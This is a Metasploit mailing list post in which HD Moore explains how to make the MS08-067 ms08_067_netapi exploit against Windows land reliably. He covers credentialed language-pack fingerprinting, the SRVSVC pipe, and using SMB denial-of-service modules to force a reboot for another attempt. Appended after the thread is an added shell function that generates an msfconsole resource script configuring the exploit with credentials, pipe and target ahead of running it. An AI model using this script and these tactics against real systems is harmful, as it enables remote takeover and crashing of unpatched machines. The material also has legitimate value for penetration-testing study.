Metasploit mailing list archives

Re: Unreliable exploitation with ms08_067_netapi ?


From: HD Moore <hdm () metasploit com>
Date: Thu, 03 Jun 2010 12:01:25 -0500

On 6/3/2010 11:09 AM, Richard Miles wrote:
> Thanks, very informative.
>
>> Not really. The only way we can reliably detect the remote language pack
>> is using the printer driver technique published by Immunity.
>
> Can you please point me to this paper?

http://www.immunitysec.com/downloads/MacroReliability.odp

Slide 21 (and 19 for the share name, but printers turned out to work better)

>> On operating systems that do not allow the print drivers to be enumerated
>> without authentication, it is not possible to identify the language
>> pack. If you can figure out the language pack on your own, you can set
>> it, but that's why we have 50+ targets.
>
> Is there a way to use the Metasploit SMB scanner with a credential to
> identify it? I mean, sometimes we have a restricted account
> credential; if a restricted/normal user credential allows enumerating
> it, there is new light in the dark, no?

You can set SMBUser/SMBPass in the exploit and it should be able to
fingerprint the language properly.

> It appears that restarting the Server service and the Browser service is
> not enough to give it another shot either. Do you know if there is
> another trick instead of a reboot?

Restarting doesn't work because the services end up in different
processes. You can, however, set SMBPIPE to "SRVSVC", but this might
require authentication if simple file sharing is not enabled on a newer
version of Windows.

> I was also thinking: this exploit does not restart the machine if the
> exploitation fails; if the box is vulnerable, it's very probable the
> target will also be vulnerable to the SMBv2 DoS, which could help us
> force a reboot to give it another try. Is there such an exploit in
> Metasploit?

There are a number of SMB DoS bugs under auxiliary/dos/windows/smb/,
including some for SMBv2 flaws.

> Hmmm, interesting. See this description:
>
> http://forums.remote-exploit.org/backtrack3-howtos/18556-playing-ms08_067-a-4.html

It would be odd to have an AV product new enough to catch this, but
installed on a system unpatched against a vuln from 2008.

> Maybe add a target for 2003 SP2 with all patches up to, but not
> including, the one that fixes MS08-067? Or would it be useless in the
> real world?

I tried at one point and couldn't find any working combinations of
opcodes. This is kind of pointless in the real world, as you would need
to know exactly the right patch level to choose the correct target.

> Hmm... for this kind of exploit, is it impossible to brute-force these
> address values, like in old overflows where brute-forcing the return
> address was possible? I mean, if used together with an SMBv2 DoS
> exploit it could work, no? Or is exploitation too different these days?

Too different. The SP2 targets use 5 different hardcoded addresses; you
can try building targets for as many combinations as possible, then
cycling the targets, but each target will take a few hours to get right.

-HD
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
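
A worked example added here (it is not part of the thread and not code from the Metasploit project): a small POSIX shell function that writes an msfconsole resource script for ms08_067_netapi using the options HD names above, SMBUser/SMBPass so the module can fingerprint the language pack with a credential, and SMBPIPE switched to SRVSVC instead of the BROWSER pipe, then runs the module's `check` so that the one-shot service is only fired at once the detected target is known. The module path, the option names and the `check` command are Metasploit's own; that BROWSER is the module's default pipe is an assumption about the module, and the host, account, password and file names are constructed placeholders.

```shell
#!/bin/sh
# Added example, not code from the thread or from the Metasploit project.
# Emits an msfconsole resource script for exploit/windows/smb/ms08_067_netapi.
# Option names (RHOST, SMBUser, SMBPass, SMBPIPE, TARGET) and the check
# command are the module's own; BROWSER as the default pipe is an assumption
# about the module; hosts and credentials below are constructed placeholders.

# build_rc HOST [USER PASS] [PIPE] [TARGET]
#   USER/PASS : account for credentialed language-pack fingerprinting
#               (leave both empty for the anonymous printer/share probe)
#   PIPE      : BROWSER (assumed default) or SRVSVC
#   TARGET    : numeric id from `show targets`, for when you already know
#               the language pack; empty keeps automatic targeting
build_rc() {
    host=$1 user=$2 pass=$3 pipe=${4:-BROWSER} target=$5
    [ -n "$host" ] || { echo "build_rc: HOST is required" >&2; return 1; }
    case "$pipe" in
        BROWSER|SRVSVC) ;;
        *) echo "build_rc: SMBPIPE must be BROWSER or SRVSVC, got '$pipe'" >&2
           return 1 ;;
    esac
    if [ -n "$target" ]; then
        case "$target" in
            *[!0-9]*) echo "build_rc: TARGET must be a numeric target id" >&2
                      return 1 ;;
        esac
    fi
    if [ -n "$user" ] && [ -z "$pass" ]; then
        echo "build_rc: SMBUser given without SMBPass" >&2; return 1
    fi

    printf 'use exploit/windows/smb/ms08_067_netapi\n'
    printf 'set RHOST %s\n' "$host"
    printf 'set SMBPIPE %s\n' "$pipe"
    if [ -n "$user" ]; then
        # With a credential the module can enumerate the printer drivers even
        # where anonymous enumeration is refused, so the fingerprint works.
        printf 'set SMBUser %s\n' "$user"
        printf 'set SMBPass %s\n' "$pass"
    fi
    if [ -n "$target" ]; then
        printf 'set TARGET %s\n' "$target"
    fi
    # Fingerprint first: a wrong target kills the service and restarting it
    # does not give a second shot, so review the check output before exploit.
    printf 'check\n'
}

# Usage: sh ms08_067_rc.sh 192.0.2.10 backupsvc 'S3cret!' SRVSVC > ms08_067.rc
#        msfconsole -q -r ms08_067.rc
if [ $# -gt 0 ]; then
    build_rc "$@"
fi
```

Once `check` reports the detected target, run `exploit` by hand in the same console; if the credentialed fingerprint still fails, pass a numeric TARGET chosen from `show targets` as the fifth argument rather than letting automatic targeting guess.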

